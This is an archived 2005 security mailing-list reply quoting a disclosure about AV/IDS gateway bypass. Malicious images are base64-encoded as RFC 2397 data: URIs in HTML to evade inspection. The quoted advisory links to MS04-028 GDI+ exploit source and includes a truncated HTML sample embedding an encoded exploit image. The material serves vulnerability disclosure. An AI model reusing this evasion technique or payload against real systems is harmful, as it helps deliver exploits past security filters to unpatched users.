lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [thread-next>] [day] [month] [year] [list]
Message-ID: <20050112203742.77430.qmail@web53205.mail.yahoo.com>
From: stevenrakick at yahoo.com (Steven Rakick)
Subject: Multi-vendor AV gateway image inspection bypass
	vulnerability

This would mean that if an image exploiting the
recently announced Microsoft LoadImage API overflow
were imbedded into HTML email there would be zero
defense from the network layer as it would be
completely invisible.

Why am I not seeing more about this in the press? It
seems pretty threatening to me...


> On Tue, 11 Jan 2005 14:58:43 -0500, Darren Bounds
> <lists@...rusense.com> wrote:
> > Hello Danny,
> > 
> > This vulnerability is only applicable to the HTTP
> data while in
> > transit. Once received by the client the image
> will
> be rendered and
> > subsequently detected if local AV software.
> > 
> > At the present time, I'm not aware of any AV, IDS
> or
> IPS vendor that
> > will detect malicious images imbedded in HTML in
> this manner.
> > 
> > 
> > Thank you,
> > 
> > Darren Bounds
> > Intrusense, LLC.
> > 
> > --
> > Intrusense - Securing Business As Usual
> > 
> > On Jan 11, 2005, at 2:14 PM, Danny wrote:
> > 
> > > On Mon, 10 Jan 2005 14:08:11 -0500, Darren
> Bounds
> > > <dbounds@...rusense.com> wrote:
> > >> -----BEGIN PGP SIGNED MESSAGE-----
> > >> Hash: SHA1
> > >>
> > >> Multi-vendor AV gateway image inspection bypass
> vulnerability
> > >> January 10, 2005
> > >>
> > >> A vulnerability has been discovered which
> allows
> a remote attacker to
> > >> bypass anti-virus
> > >> (as well other security technologies such as
> IDS
> and IPS) inspection
> > >> of
> > >> HTTP image content.
> > >>
> > >> By leveraging techniques described in RFC 2397
> for base64 encoding
> > >> image content within
> > >> the URL scheme. A remote attack may encode a
> malicious image within
> > >> the
> > >> body of an HTML
> > >> formatted document to circumvent content
> inspection.
> > >>
> > >> For example:
> > >>
> > >>
>
http://www.k-otik.com/exploits/09222004.ms04-28-cmd.c.php
> > >>
> > >> The source code at the URL above will by
> default
> create a JPEG image
> > >> that will attempt (and fail
> > >> without tweaking) to exploit the Microsoft
> MS04-028 GDI+
> > >> vulnerability.
> > >> The image itself is detected
> > >> by all AV gateway engines tested (Trend, Sophos
> and McAfee), however,
> > >> when the same image
> > >> is base64 encoded using the technique described
> in RFC 2397
> > >> (documented
> > >> below), inspection
> > >> is not performed and is delivered rendered by
> the
> client.
> > >>
> > >> While Microsoft Internet Explorer does not
> support the RFC 2397 URL
> > >> scheme; Firefox, Safari,
> > >> Mozilla and Opera do and will render the data
> and
> thus successfully
> > >> execute the payload if the necessary
> > >> OS and/or application patches have not been
> applied.
> > >>
> > >> ## BEGIN HTML ##
> > >>
> > >> <html>
> > >> <body>
> > >> <img
> > >>
>
src="data:image/gif;base64,/9j/4AAQSkZJRgABAQEAYABgAAD//
> > >> gAARXhpZgAASUkqAAgAHPD9f0FBQUGWAgAAGgAAABzw
> > >> /
> > >>
>
X9BQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUF
> > >> B
> > >>
>
QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQU
> > >> FB
> > >>
>
QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQU
> > >> FB
> > >>
>
QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQU
> > >> FB
> > >>
>
QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQU
> > >> FB
> > >>
>
QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQU
> > >> FB
> > >>
>
QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQU
> > >> FB
> > >>
>
QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQU
> > >> FB
> > >>
>
QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQU
> > >> FB
> > >>
>
QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQU
> > >> FB
> > >>
>
QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQU
> > >> FB
> > >>
>
QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQU
> > >> FB
> > >>
>
QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQU
> > >> FB
> > >>
>
QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQU
> > >> FB
> > >>
>
QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQU
> > >> FB
> > >>
>
QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQU
> > >> FB
> > >>
>
QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQU
> > >> FB
> > >>
>
QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQU
> > >> FB
> > >>
> QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQQAAAP/
> > >> bAEMACAYGBwYFCAcHBwkJ
> > >>
>
CAoMFA0MCwsMGRITDxQdGh8eHRocHCAkLicgIiwjHBwoNyksMDE0NDQfJzk9ODI8LjM0Mv
> > >> /b
> > >>
>
AEMBCQkJDAsMGA0NGDIhHCEyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMj
> > >> Iy
> > >> MjIyMjIyMjIyMjIyMv/AABEIAAMAAwMBIgACEQEDEQH/
> > >> xAAfAAABBQEBAQEBAQAAAAAAAAAA
> > >> AQIDBAUGBwgJCgv/
> > >>
>
xAC1EAACAQMDAgQDBQUEBAAAAX0BAgMABBEFEiExQQYTUWEHInEUMoGR
> > >>
>
oQgjQrHBFVLR8CQzYnKCCQoWFxgZGiUmJygpKjQ1Njc4OTpDREVGR0hJSlNUVVZXWFlaY2
> > >> Rl
> > >>
>
ZmdoaWpzdHV2d3h5eoOEhYaHiImKkpOUlZaXmJmaoqOkpaanqKmqsrO0tba3uLm6wsPExc
> > >> bH
> 
=== message truncated ===



		
__________________________________ 
Do you Yahoo!? 
Yahoo! Mail - now with 250MB free storage. Learn more.
http://info.mail.yahoo.com/mail_250

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ